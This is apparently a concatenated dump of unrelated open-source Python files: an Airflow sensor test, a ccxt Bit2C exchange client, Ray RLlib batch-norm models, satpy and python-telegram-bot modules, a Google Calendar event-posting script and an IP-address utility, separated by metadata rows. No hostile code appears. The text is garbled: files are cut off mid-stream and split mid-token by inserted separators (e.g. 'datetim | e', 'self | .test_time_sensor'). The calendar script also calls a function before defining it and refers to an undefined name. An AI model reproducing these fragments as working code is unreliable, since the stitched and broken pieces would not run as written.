if isinstance(config, BasePlugin):
module_name = config.name + "." + name
module = importlib.import_module(module_name)
yield module
def get_urls(name):
for module in get_app_modules("urls"):
urls = getattr(module, name, None)
if urls is not None:
yield urls
|
mistercrunch/airflow
|
tests/sensors/test_external_task_sensor.py
|
Python
|
apache-2.0
| 35,537
| 0.002561
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import logging
import unittest
from datetime import time, timedelta
import pytest
from airflow import exceptions, settings
from airflow.exceptions import AirflowException, AirflowSensorTimeout
from airflow.models import DagBag, DagRun, TaskInstance
from airflow.models.dag import DAG
from airflow.operators.bash import BashOperator
from airflow.operators.dummy import DummyOperator
from airflow.sensors.external_task import ExternalTaskMarker, ExternalTaskSensor
from airflow.sensors.time_sensor import TimeSensor
from airflow.serialization.serialized_objects import SerializedBaseOperator
from airflow.utils.session import provide_session
from airflow.utils.state import DagRunState, State, TaskInstanceState
from airflow.utils.timezone import datetime
from airflow.utils.types import DagRunType
from tests.test_utils.db import clear_db_runs
DEFAULT_DATE = datetime(2015, 1, 1)
TEST_DAG_ID = 'unit_test_dag'
TEST_TASK_ID = 'time_sensor_check'
TEST_TASK_ID_ALTERNATE = 'time_sensor_check_alternate'
DEV_NULL = '/dev/null'
@pytest.fixture(autouse=True)
def clean_db():
clear_db_runs()
class TestExternalTaskSensor(unittest.TestCase):
def setUp(self):
self.dagbag = DagBag(dag_folder=DEV_NULL, include_examples=True)
self.args = {'owner': 'airflow', 'start_date': DEFAULT_DATE}
self.dag = DAG(TEST_DAG_ID, default_args=self.args)
def test_time_sensor(self, task_id=TEST_TASK_ID):
op = TimeSensor(task_id=task_id, target_time=time(0), dag=self.dag)
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_external_task_sensor(self):
self.test_time_sensor()
op = ExternalTaskSensor(
task_id='test_external_task_sensor_check',
external_dag_id=TEST_DAG_ID,
external_task_id=TEST_TASK_ID,
dag=self.dag,
)
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_external_task_sensor_multiple_task_ids(self):
self.test_time_sensor(task_id=TEST_TASK_ID)
self
|
.test_time_sensor(task_id=TEST_TASK_ID_ALTERNATE)
op = ExternalTaskSensor(
task_id='test_external_task_sensor_check_task_ids',
external_dag_id=TEST_DAG_ID,
external_task_ids=[TEST_TASK_ID, TEST_TASK_ID_ALTERNATE],
dag=self.dag,
)
op.run(start_date=DEFAULT_DATE, end_date
|
=DEFAULT_DATE, ignore_ti_state=True)
def test_catch_overlap_allowed_failed_state(self):
with pytest.raises(AirflowException):
ExternalTaskSensor(
task_id='test_external_task_sensor_check',
external_dag_id=TEST_DAG_ID,
external_task_id=TEST_TASK_ID,
allowed_states=[State.SUCCESS],
failed_states=[State.SUCCESS],
dag=self.dag,
)
def test_external_task_sensor_wrong_failed_states(self):
with pytest.raises(ValueError):
ExternalTaskSensor(
task_id='test_external_task_sensor_check',
external_dag_id=TEST_DAG_ID,
external_task_id=TEST_TASK_ID,
failed_states=["invalid_state"],
dag=self.dag,
)
def test_external_task_sensor_failed_states(self):
self.test_time_sensor()
op = ExternalTaskSensor(
task_id='test_external_task_sensor_check',
external_dag_id=TEST_DAG_ID,
external_task_id=TEST_TASK_ID,
failed_states=["failed"],
dag=self.dag,
)
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_external_task_sensor_failed_states_as_success(self):
self.test_time_sensor()
op = ExternalTaskSensor(
task_id='test_external_task_sensor_check',
external_dag_id=TEST_DAG_ID,
external_task_id=TEST_TASK_ID,
allowed_states=["failed"],
failed_states=["success"],
dag=self.dag,
)
with self.assertLogs(op.log, level=logging.INFO) as cm:
with pytest.raises(AirflowException) as ctx:
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
assert (
'INFO:airflow.task.operators:Poking for tasks [\'time_sensor_check\']'
' in dag unit_test_dag on %s ... ' % DEFAULT_DATE.isoformat() in cm.output
)
assert (
str(ctx.value) == "Some of the external tasks "
"['time_sensor_check'] in DAG "
"unit_test_dag failed."
)
def test_external_task_sensor_failed_states_as_success_mulitple_task_ids(self):
self.test_time_sensor(task_id=TEST_TASK_ID)
self.test_time_sensor(task_id=TEST_TASK_ID_ALTERNATE)
op = ExternalTaskSensor(
task_id='test_external_task_sensor_check_task_ids',
external_dag_id=TEST_DAG_ID,
external_task_ids=[TEST_TASK_ID, TEST_TASK_ID_ALTERNATE],
allowed_states=["failed"],
failed_states=["success"],
dag=self.dag,
)
with self.assertLogs(op.log, level=logging.INFO) as cm:
with pytest.raises(AirflowException) as ctx:
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
assert (
'INFO:airflow.task.operators:Poking for tasks '
'[\'time_sensor_check\', \'time_sensor_check_alternate\'] '
'in dag unit_test_dag on %s ... ' % DEFAULT_DATE.isoformat() in cm.output
)
assert (
str(ctx.value) == "Some of the external tasks "
"['time_sensor_check', 'time_sensor_check_alternate'] in DAG "
"unit_test_dag failed."
)
def test_external_dag_sensor(self):
other_dag = DAG('other_dag', default_args=self.args, end_date=DEFAULT_DATE, schedule_interval='@once')
other_dag.create_dagrun(
run_id='test', start_date=DEFAULT_DATE, execution_date=DEFAULT_DATE, state=State.SUCCESS
)
op = ExternalTaskSensor(
task_id='test_external_dag_sensor_check',
external_dag_id='other_dag',
external_task_id=None,
dag=self.dag,
)
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_external_task_sensor_fn_multiple_execution_dates(self):
bash_command_code = """
{% set s=logical_date.time().second %}
echo "second is {{ s }}"
if [[ $(( {{ s }} % 60 )) == 1 ]]
then
exit 1
fi
exit 0
"""
dag_external_id = TEST_DAG_ID + '_external'
dag_external = DAG(dag_external_id, default_args=self.args, schedule_interval=timedelta(seconds=1))
task_external_with_failure = BashOperator(
task_id="task_external_with_failure", bash_command=bash_command_code, retries=0, dag=dag_external
)
task_external_without_failure = DummyOperator(
task_id="task_external_without_failure", retries=0, dag=dag_external
)
task_external_without_failure.run(
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE + timedelta(seconds=1), ignore_ti_state=True
)
session = settings.Session()
TI
|
tritoanst/ccxt
|
python/ccxt/async/bit2c.py
|
Python
|
mit
| 6,650
| 0.001353
|
# -*- coding: utf-8 -*-
from ccxt.async.base.exchange import Exchange
import hashlib
class bit2c (Exchange):
def describe(self):
return self.deep_extend(super(bit2c, self).describe(), {
'id': 'bit2c',
'name': 'Bit2C',
'countries': 'IL', # Israel
'rateLimit': 3000,
'hasCORS': False,
'urls': {
'logo': 'https://user-images.githubusercontent.com/1294454/27766119-3593220e-5ece-11e7-8b3a-5a041f6bcc3f.jpg',
'api': 'https://www.bit2c.co.il',
'www': 'https://www.bit2c.co.il',
'doc': [
'https://www.bit2c.co.il/home/api',
'https://github.com/OferE/bit2c',
],
},
'api': {
'public': {
'get': [
'Exchanges/{pair}/Ticker',
'Exchanges/{pair}/orderbook',
'Exchanges/{pair}/trades',
],
},
'private': {
'post': [
'Account/Balance',
'Account/Balance/v2',
'Merchant/CreateCheckout',
'Order/AccountHistory',
'Order/AddCoinFundsRequest',
'Order/AddFund',
'Order/AddOrder',
'Order/AddOrderMarketPriceBuy',
'Order/AddOrderMarketPriceSell',
'Order/CancelOrder',
'Order/MyOrders',
'Payment/GetMyId',
'Payment/Send',
],
},
},
'markets': {
'BTC/NIS': {'id': 'BtcNis', 'symbol': 'BTC/NIS', 'base': 'BTC', 'quote': 'NIS'},
'BCH/NIS': {'id': 'BchNis', 'symbol': 'BCH/NIS', 'base': 'BCH', 'quote': 'NIS'},
'LTC/NIS': {'id': 'LtcNis', 'symbol': 'LTC/NIS', 'base': 'LTC', 'quote': 'NIS'},
'BTG/NIS': {'id': 'BtgNis', 'symbol': 'BTG/NIS', 'base': 'BTG', 'quote': 'NIS'},
},
'fees': {
'trading': {
'maker': 0.5 / 100,
'taker': 0.5 / 100,
},
},
})
async def fetch_balance(self, params={}):
balance = await self.privatePostAccountBalanceV2()
result = {'info': balance}
currencies = list(self.currencies.keys())
for i in range(0, len(currencies)):
currency = currencies[i]
account = self.account()
if currency in balance:
available = 'AVAILABLE_' + currency
account['free'] = balance[available]
account['total'] = balance[currency]
account['used'] = account['total'] - account['free']
result[currency] = account
return self.parse_balance(result)
async def fetch_order_book(self, symbol, params={}):
orderbook = await self.publicGetExchangesPairOrderbook(self.extend({
'pair': self.market_id(symbol),
}, params))
return self.parse_order_book(orderbook)
async def fetch_ticker(self, symbol, params={}):
ticker = await self.publicGetExchangesPairTicker(self.extend({
'pair': self.market_id(symbol),
}, params))
timestamp = self.milliseconds()
averagePrice = float(ticker['av'])
baseVolume = float(ticker['a'])
quoteVolume = baseVolume * averagePrice
return {
'symbol': symbol,
'timestamp': timestamp,
'datetim
|
e': self.iso8601(timestamp),
'high': None,
'low': None,
'bid': float(ticker['h']),
'ask': float(ticker['l']),
'vwap': None,
'open': None,
'close': None,
'first': None,
'last': float(ticker['ll']),
'change': None,
'percentage': None,
'average': averagePrice,
'baseVolume': baseVolume,
'qu
|
oteVolume': quoteVolume,
'info': ticker,
}
def parse_trade(self, trade, market=None):
timestamp = int(trade['date']) * 1000
symbol = None
if market:
symbol = market['symbol']
return {
'id': str(trade['tid']),
'info': trade,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'symbol': symbol,
'order': None,
'type': None,
'side': None,
'price': trade['price'],
'amount': trade['amount'],
}
async def fetch_trades(self, symbol, since=None, limit=None, params={}):
market = self.market(symbol)
response = await self.publicGetExchangesPairTrades(self.extend({
'pair': market['id'],
}, params))
return self.parse_trades(response, market, since, limit)
async def create_order(self, symbol, type, side, amount, price=None, params={}):
method = 'privatePostOrderAddOrder'
order = {
'Amount': amount,
'Pair': self.market_id(symbol),
}
if type == 'market':
method += 'MarketPrice' + self.capitalize(side)
else:
order['Price'] = price
order['Total'] = amount * price
order['IsBid'] = (side == 'buy')
result = await getattr(self, method)(self.extend(order, params))
return {
'info': result,
'id': result['NewOrder']['id'],
}
async def cancel_order(self, id, symbol=None, params={}):
return await self.privatePostOrderCancelOrder({'id': id})
def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
url = self.urls['api'] + '/' + self.implode_params(path, params)
if api == 'public':
url += '.json'
else:
self.check_required_credentials()
nonce = self.nonce()
query = self.extend({'nonce': nonce}, params)
body = self.urlencode(query)
signature = self.hmac(self.encode(body), self.encode(self.secret), hashlib.sha512, 'base64')
headers = {
'Content-Type': 'application/x-www-form-urlencoded',
'key': self.apiKey,
'sign': self.decode(signature),
}
return {'url': url, 'method': method, 'body': body, 'headers': headers}
|
richardliaw/ray
|
rllib/examples/models/batch_norm_model.py
|
Python
|
apache-2.0
| 7,538
| 0
|
import numpy as np
from ray.rllib.models.modelv2 import ModelV2
from ray.rllib.models.tf.misc import normc_initializer
from ray.rllib.models.tf.tf_modelv2 import TFModelV2
from ray.rllib.models.torch.misc import SlimFC, normc_initializer as \
torch_normc_initializer
from ray.rllib.models.torch.torch_modelv2 import TorchModelV2
from ray.rllib.utils.annotations import override
from ray.rllib.utils.framework import try_import_tf, try_import_torch
tf1, tf, tfv = try_import_tf()
torch, nn = try_import_torch()
class BatchNormModel(TFModelV2):
"""Example of a TFModelV2 that is built w/o using tf.keras.
NOTE: This example does not work when using a keras-based TFModelV2 due
to a bug in keras related to missing values for input placeholders, even
though these input values have been provided in a forward pass through the
actual keras Model.
All Model logic (layers) is defined in the `forward` method (incl.
the batch_normalization layers). Also, all variables are registered
(only once) at the end of `forward`, so an optimizer knows which tensors
to train on. A standard `value_function` override is used.
"""
capture_index = 0
def __init__(self, obs_space, action_space, num_outputs, model_config,
name):
super().__init__(obs_space, action_space, num_outputs, model_config,
name)
# Have we registered our vars yet (see `forward`)?
self._registered = False
@override(ModelV2)
def forward(self, input_dict, state, seq_lens):
last_layer = input_dict["obs"]
hiddens = [256, 256]
with tf1.variable_scope("model", reuse=tf1.AUTO_REUSE):
for i, size in enumerate(hiddens):
last_layer = tf1.layers.dense(
last_layer,
size,
kernel_initializer=normc_initializer(1.0),
activation=tf.nn.tanh,
name="fc{}".format(i))
# Add a batch norm layer
last_layer = tf1.layers.batch_normalization(
last_layer,
training=input_dict["is_training"],
name="bn_{}".format(i))
output = tf1.layers.dense(
last_layer,
self.num_outputs,
kernel_initializer=normc_initializer(0.01),
activation=None,
name="out")
self._value_out = tf1.layers.dense(
last_layer,
1,
kernel_initializer=normc_initializer(1.0),
activation=None,
name="vf")
if not self._registered:
self.register_variables(
tf1.get_collection(
tf1.GraphKeys.TRAINABLE_VARIABLES, scope=".+/model/.+"))
self._registered = True
return output, []
@override(ModelV2)
def value_function(self):
return tf.reshape(s
|
elf._value_out, [-1])
class KerasBatchNormModel(TFModelV2):
"""Keras version of above BatchNormModel with exactly the same structure.
IMORTANT NOTE: This model will not work with PPO due to a bug in keras
that surfaces when having more than one input place
|
holder (here: `inputs`
and `is_training`) AND using the `make_tf_callable` helper (e.g. used by
PPO), in which auto-placeholders are generated, then passed through the
tf.keras. models.Model. In this last step, the connection between 1) the
provided value in the auto-placeholder and 2) the keras `is_training`
Input is broken and keras complains.
Use the above `BatchNormModel` (a non-keras based TFModelV2), instead.
"""
def __init__(self, obs_space, action_space, num_outputs, model_config,
name):
super().__init__(obs_space, action_space, num_outputs, model_config,
name)
inputs = tf.keras.layers.Input(shape=obs_space.shape, name="inputs")
is_training = tf.keras.layers.Input(
shape=(), dtype=tf.bool, batch_size=1, name="is_training")
last_layer = inputs
hiddens = [256, 256]
for i, size in enumerate(hiddens):
label = "fc{}".format(i)
last_layer = tf.keras.layers.Dense(
units=size,
kernel_initializer=normc_initializer(1.0),
activation=tf.nn.tanh,
name=label)(last_layer)
# Add a batch norm layer
last_layer = tf.keras.layers.BatchNormalization()(
last_layer, training=is_training[0])
output = tf.keras.layers.Dense(
units=self.num_outputs,
kernel_initializer=normc_initializer(0.01),
activation=None,
name="fc_out")(last_layer)
value_out = tf.keras.layers.Dense(
units=1,
kernel_initializer=normc_initializer(0.01),
activation=None,
name="value_out")(last_layer)
self.base_model = tf.keras.models.Model(
inputs=[inputs, is_training], outputs=[output, value_out])
self.register_variables(self.base_model.variables)
@override(ModelV2)
def forward(self, input_dict, state, seq_lens):
out, self._value_out = self.base_model(
[input_dict["obs"], input_dict["is_training"]])
return out, []
@override(ModelV2)
def value_function(self):
return tf.reshape(self._value_out, [-1])
class TorchBatchNormModel(TorchModelV2, nn.Module):
"""Example of a TorchModelV2 using batch normalization."""
capture_index = 0
def __init__(self, obs_space, action_space, num_outputs, model_config,
name, **kwargs):
TorchModelV2.__init__(self, obs_space, action_space, num_outputs,
model_config, name)
nn.Module.__init__(self)
layers = []
prev_layer_size = int(np.product(obs_space.shape))
self._logits = None
# Create layers 0 to second-last.
for size in [256, 256]:
layers.append(
SlimFC(
in_size=prev_layer_size,
out_size=size,
initializer=torch_normc_initializer(1.0),
activation_fn=nn.ReLU))
prev_layer_size = size
# Add a batch norm layer.
layers.append(nn.BatchNorm1d(prev_layer_size))
self._logits = SlimFC(
in_size=prev_layer_size,
out_size=self.num_outputs,
initializer=torch_normc_initializer(0.01),
activation_fn=None)
self._value_branch = SlimFC(
in_size=prev_layer_size,
out_size=1,
initializer=torch_normc_initializer(1.0),
activation_fn=None)
self._hidden_layers = nn.Sequential(*layers)
self._hidden_out = None
@override(ModelV2)
def forward(self, input_dict, state, seq_lens):
# Set the correct train-mode for our hidden module (only important
# b/c we have some batch-norm layers).
self._hidden_layers.train(mode=input_dict.get("is_training", False))
self._hidden_out = self._hidden_layers(input_dict["obs"])
logits = self._logits(self._hidden_out)
return logits, []
@override(ModelV2)
def value_function(self):
assert self._hidden_out is not None, "must call forward first!"
return torch.reshape(self._value_branch(self._hidden_out), [-1])
|
pytroll/satpy
|
satpy/modifiers/__init__.py
|
Python
|
gpl-3.0
| 1,328
| 0
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2020 Satpy developers
#
# This file is part of satpy.
#
# satpy is free software: you can redistribute it and/or modify it under the
# terms of the GNU General Public License as published by the Free Software
# Foundation, either version 3 of the License, or (at your option) any later
# version.
#
# satpy is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# satpy. If not, see <http://www.gnu.org/licenses/>.
"""Modifier classes and other r
|
elated utilities."""
# file deepcode ignore W0611: Ignore unused imports in init module
from .base import ModifierBase # noqa: F401, isort: skip
from .atmosphere import CO2Corrector # noqa: F401
from .atmosphere import PSPAtmosphericalCorrection # noqa: F401
from .atmosphere import PSPRayleighReflectance # noqa: F401
from .geometry import EffectiveSolarPathLengthCorrector # noqa: F401
from
|
.geometry import SunZenithCorrector # noqa: F401
from .spectral import NIREmissivePartFromReflectance # noqa: F401
from .spectral import NIRReflectance # noqa: F401
|
franciscod/python-telegram-bot
|
telegram/inlinequeryresultcachedvideo.py
|
Python
|
gpl-2.0
| 2,181
| 0.001376
|
#!/usr/bin/env python
#
# A library that provides a Python interface to the Telegram Bot API
# Copyright (C) 2015-2016
# Leandro Toledo de Souza <devs@python-telegram-bot.org>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR
|
PURPOSE. See the
# GNU Lesser Public License for more details.
#
# You should have received a copy of the GNU Lesser Public License
# along with this program. If not, see [http://www.gnu.org/licenses/].
"""This module
|
contains the classes that represent Telegram
InlineQueryResultCachedVideo"""
from telegram import InlineQueryResult, InlineKeyboardMarkup, InputMessageContent
class InlineQueryResultCachedVideo(InlineQueryResult):
def __init__(self,
id,
video_file_id,
title,
description=None,
caption=None,
reply_markup=None,
input_message_content=None,
**kwargs):
# Required
super(InlineQueryResultCachedVideo, self).__init__('video', id)
self.video_file_id = video_file_id
self.title = title
# Optionals
if description:
self.description = description
if caption:
self.caption = caption
if reply_markup:
self.reply_markup = reply_markup
if input_message_content:
self.input_message_content = input_message_content
@staticmethod
def de_json(data):
data = super(InlineQueryResultCachedVideo, InlineQueryResultCachedVideo).de_json(data)
data['reply_markup'] = InlineKeyboardMarkup.de_json(data.get('reply_markup'))
data['input_message_content'] = InputMessageContent.de_json(data.get(
'input_message_content'))
return InlineQueryResultCachedVideo(**data)
|
eikiu/tdf-actividades
|
_admin-scripts/tdf_gcal.py
|
Python
|
cc0-1.0
| 28,476
| 0.034032
|
#!/usr/bin/python3
'''
Calculate posting schedules in social media of events and add them to google calendar
so they can be posted using IFTTT (so dirty!)
'''
# Google Developers Console:
# project name: tdf-eventos-gcalcli
# activate gcal API
# activate OAuth 2.0 API
# instal: pip3 install --upgrade google-api-python-client
#URL SHORTENER:
# urlshortener.url.list to get a list of shortened links from user
# urlshortener.url.get get info about a shorted url
#GCAL:
# probably we could need it. event['id'] (same as event['iCalUID'], this has @google.com)
# TODO: save processed events to the txt file once the city is done. (avoid possible losts when script breaks)
# FIX: Sometimes it doesnt parse properly (example as of 2017-11-29: Primera Ecomaratón Playas Limpias, Kendo - Seminario Tierra del Fuego)
# TODO: use the metadata in file to check if it's old or not. Reason: events that span multiple days (expositions) and were added later.
# TODO: support to create shorturls
# PRobably we should read config file so we dont hardcode stuff
# TODO: find a way to fix updated events.
# - Search the event in calendar, edit
# - delete the line in processed posts and just add the new one
#
# creating function (https://developers.google.com/google-apps/calendar/v3/reference/events/update)
# []Promps user to enter text to search;
# []searches and gets id;
# prints event info
# asks what to update (start, end, title, location) add more
# creates new title/summary and description
# updates event
# use named tuples
'''>>> from collections import namedtuple
>>> Point = namedtuple('Point', ['x','y'])
>>> p = Point(x=11,y=22)
>>> p = p._replace(x=80)
>>> p
Point(x=80, y=22)
'''
#import sys
import os
import json
import argparse
import random #for the minutes
import datetime
import re
import time
# required Libs (for Google connect)
try:
from apiclient.discovery import build
from oauth2client.client import OAuth2WebServerFlow
from oauth2client.file import Storage
from oauth2client import tools
from apiclient.errors import HttpError
import httplib2
except ImportError as e:
print (" Need Google API libs. Install with: pip3 install --upgrade google-api-python-client")
exit()
#optional libs
try:
import yaml
YAML = True
except ImportError:
#YAML = False
#print (" next time install pyyaml")
print (" Install : pip3 install pyyaml")
exit()
# --------------
# configuration
# --------------
CALENDAR_ID = "primary
|
" #IFTTT uses the primary calendar
POST_FOLDER = '_posts'
# where the posts reside
CITIES = ('rio-grande'
|
,'ushuaia','tolhuin')
# we are in a subfolder now, must get the parent folder
ROOT_DIR = os.path.dirname(os.getcwd())
PROCESSED_POSTS_FILE = "processed-posts.txt" #date,city,filename
PROCESSED_POSTS_FILE_LINE = "{ciudad}@{filename}"
# how the places folder is called. rio-grande is called riogrande
PLACES_FOLDER = "_lugares-{ciudad}"
HOUR_SCHEDULE = ('09', '13', '17', '21') #minutes are random
DAYS_BEFORE = 11 #How many days before do we start posting the event?
DAYS_SPANS_MANUAL_UPDATE = 3 # mostly for site update
GOOGLE_AUTH = "client_secrets.json"
USER_CREDENTIALS = 'gcal-tdf-credentials.json'
APPLICATION_NAME = 'tdf-eventos-gcalcli'
# -------------------
# end configuration
# -------------------
FILES_FOR_PROCESSED_LIST = list() #so we write everything once
PROCESSED_POSTS_FILE = os.path.join(os.getcwd(),PROCESSED_POSTS_FILE)
GOOGLE_AUTH = os.path.join(os.getcwd(), GOOGLE_AUTH)
USER_CREDENTIALS = os.path.join(os.getcwd(), USER_CREDENTIALS)
# be nice and allow to include the secret/keys as paramenters
parser = argparse.ArgumentParser()
parser.add_argument("--client", help="path of the client_secret.json")
parser.add_argument("--user", help="path of the user secret_key.json")
parser.add_argument("--clean", help="Cleans the processed file list", action="store_true")
parser.add_argument("--edit", help="Edit an event")
parser.add_argument("--site-update", "-su", help="Add manually, starts from today and spans " + str(DAYS_SPANS_MANUAL_UPDATE) + " days. Mostly for site updates.")
#args = vars(parser.parse_args()) #to dict
args = parser.parse_args()
if args.clean:
clean_processed_file()
exit()
if args.client or args.user:
if args.client:
GOOGLE_AUTH = args.client
if args.user:
USER_CREDENTIALS = args.user
if not os.path.exists(GOOGLE_AUTH):
print (" sorry, I need the app credentials.")
exit()
if args.edit:
#edit_event()
print ("not yet implemented. Sorry")
exit()
# --------------
# functions
# --------------
def get_processed_file():
"""Get the processed file, returning it as a list.
Returns:
list
"""
if os.path.exists(PROCESSED_POSTS_FILE):
with open(PROCESSED_POSTS_FILE,'r',encoding="utf-8") as tmp:
#readlines() includes de new-line char. we want things easy ;)
return tmp.read().splitlines()
return False
def clean_processed_file():
"""Filters processed file, deleting old entries. """
today = datetime.datetime.today()
processed_posts = get_processed_file()
if not processed_posts:
print (" there was an error with the processed file. Does it exist?")
return False
cleaned_posts = list()
for row in processed_posts:
tmp_line = row.split("@")[1]
tmp_line = tmp_line[0:10]
tmp_date = datetime.datetime.strptime(tmp_line, '%Y-%m-%d')
if tmp_date >= today:
cleaned_posts.append(row)
if len(cleaned_posts) > 0:
with open(PROCESSED_POSTS_FILE,'w',encoding="utf-8") as tmp:
tmp.write("\n".join(cleaned_posts))
print(" Processed file cleaned!")
else:
print(" Everything is ok. Processed file not modified. ")
def googleAuth():
"""Authenticate Google API call
Returns:
http object (authorized)
"""
# Storage object holds the credentials (for a single user)
# If the file does not exist, it is created.
storage = Storage(USER_CREDENTIALS)
# Get the credentials
credentials = storage.get()
if not credentials or credentials.invalid:
'''
flow = OAuth2WebServerFlow(client_id=API_CLIENT_ID,
client_secret=API_CLIENT_SECRET,
scope=['https://www.googleapis.com/auth/calendar',
'https://www.googleapis.com/auth/urlshortener']
)
'''
flow = client.flow_from_clientsecrets(
GOOGLE_AUTH,
scope=['https://www.googleapis.com/auth/calendar',
'https://www.googleapis.com/auth/urlshortener'],
)
flow.user_agent = APPLICATION_NAME
# new credentials need to be obtained.
# oauth2client.tools.run() opens an authorization server page
# in default web browser.
# The new credentials are also stored in the Storage object,
# which updates the credentials file.
flags = argparse.ArgumentParser(parents=[tools.argparser]).parse_args()
if flags:
credentials = tools.run_flow(flow, storage, flags)
print (" storing credentials to " + USER_CREDENTIALS)
# authorize credentials
http = credentials.authorize(httplib2.Http())
return http
def useService(service_type):
""" "Shortcut" to the service/API call
Args:
service_type (str): which service? calendar or url (urlshortener)
Returns:
build object kind of thing (google)
"""
service = ("", "")
if service_type == "calendar":
service = ("calendar", "v3")
elif service_type == "url":
service = ("urlshortener", "v1")
else:
print (" wrong key for Google Service")
exit()
return build(serviceName=service[0], version=service[1], http=googleAuth())
def listEvents():
# The Calendar API's events().list method returns paginated results, so we
# have to execute the request in a paging loop. First, build the
# request object. The arguments provided are:
# primary calendar for user
service = useService('calendar')
request = service.events().list(calendarId=CALENDAR_ID)
# Loop until all pages have been processed.
while request != None
|
srguiwiz/nrvr-commander
|
src/nrvr/util/ipaddress.py
|
Python
|
bsd-2-clause
| 7,449
| 0.003088
|
#!/usr/bin/python
"""nrvr.util.ipaddress - Utilities regarding IP addresses
Class provided by this module is IPAddress.
Works in Linux and Windows.
Idea and first implementation - Leo Baschy <srguiwiz12 AT nrvr DOT com>
Contributor - Nora Baschy
Public repository - https://github.com/srguiwiz/nrvr-commander
Copyright (c) Nirvana Research 2006-2015.
Simplified BSD License"""
import re
class IPAddress(object):
"""Methods for multiple machines on one subnet.
As implemented only supports IPv4."""
octetsRegex = re.compile(r"^\s*([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})\s*$")
@classmethod
def asList(cls, ipaddress, rangeCheck=False):
"""For ipaddress="10.123.45.67" return mutable [10, 123, 45, 67].
If already a list, a copy is made and returned."""
if isinstance(ipaddress, basestring):
octetsMatch = IPAddress.octetsRegex.search(ipaddress)
if not octetsMatch:
raise Exception("won't recognize as IP address: {0}".format(ipaddress))
octets = [octetsMatch.group(1),
octetsMatch.group(2),
octetsMatch.group(3),
octetsMatch.group(4)]
for index, octet in enumerate(octets):
octet = int(octet)
if rangeCheck and octet > 255:
raise Exception("won't recognize as IP address because > 255: {0}".format(ipaddress))
|
octets[index] = octet
return octets
elif isinstance(ipaddress, (int, long)):
octets = []
while ipaddress:
octets.append(ipaddress % 256)
ipaddress /= 256
octets += [0 for i in range(max(4 - len(octets), 0))]
octets.reverse()
return octets
else:
# force making a copy
return list(ipaddress)
@classmetho
|
d
def asTuple(cls, ipaddress):
"""For ipaddress="10.123.45.67" return immutable (10, 123, 45, 67)."""
if isinstance(ipaddress, tuple):
return ipaddress
elif isinstance(ipaddress, list):
return tuple(ipaddress)
else:
return tuple(cls.asList(ipaddress))
@classmethod
def asString(cls, ipaddress):
"""For ipaddress=[10, 123, 45, 67] return "10.123.45.67"."""
if isinstance(ipaddress, basestring):
return ipaddress
if isinstance(ipaddress, (int, long)):
ipaddress = cls.asList(ipaddress)
return ".".join(map(str, ipaddress))
@classmethod
def asInteger(cls, ipaddress):
"""For ipaddress=[10, 123, 45, 67] return 175844675.
At the time of this writing, such an integer however is
not accepted as input by other methods of this class."""
octets = cls.asList(ipaddress) # must make a copy
integer = 0
while octets:
integer = 256 * integer + octets.pop(0)
return integer
@classmethod
def bitAnd(cls, one, other):
if not isinstance(one, (list, tuple)):
one = cls.asList(one)
if not isinstance(other, (list, tuple)):
other = cls.asList(other)
octets = []
for oneOctet, otherOctet in zip(one, other):
octets.append(oneOctet & otherOctet)
return octets
@classmethod
def bitOr(cls, one, other):
if not isinstance(one, (list, tuple)):
one = cls.asList(one)
if not isinstance(other, (list, tuple)):
other = cls.asList(other)
octets = []
for oneOctet, otherOctet in zip(one, other):
octets.append(oneOctet | otherOctet)
return octets
@classmethod
def bitNot(cls, one):
if not isinstance(one, (list, tuple)):
one = cls.asList(one)
octets = []
for oneOctet in one:
octets.append(~oneOctet & 255)
return octets
@classmethod
def nameWithNumber(cls, stem, ipaddress, octets=1, separator="-"):
"""For stem="example" and ipaddress="10.123.45.67" return "example-067".
If octets=2 return "example-045-067"."""
name = stem
ipaddress = IPAddress.asTuple(ipaddress)
if not separator:
# empty string instead of e.g. None
separator = ""
for index in range(-octets, 0):
# create leading zeros, e.g. from "19" to "019"
name += separator + "%03d" % ipaddress[index]
return name
@classmethod
def numberWithinSubnet(cls, oneInSubnet, otherNumber, netmask="255.255.255.0"):
"""For oneInSubnet="10.123.45.67" and otherNumber="89" return [10, 123, 45, 89].
For oneInSubnet="10.123.45.67" and otherNumber="89.34" and netmask="255.255.0.0" return [10, 123, 89, 34]."""
if not isinstance(oneInSubnet, (list, tuple)):
oneInSubnet = cls.asList(oneInSubnet)
# less than stellar decoding of otherNumber, but it works in actual use cases
if isinstance(otherNumber, int):
# in theory handling more than 16 bits' 65536 would be desirable,
# practically handling up to 16 bits' 65535 is enough
if otherNumber <= 255:
otherNumber = [otherNumber]
else:
otherNumber = [otherNumber >> 8, otherNumber & 255]
if not isinstance(otherNumber, (list, tuple)):
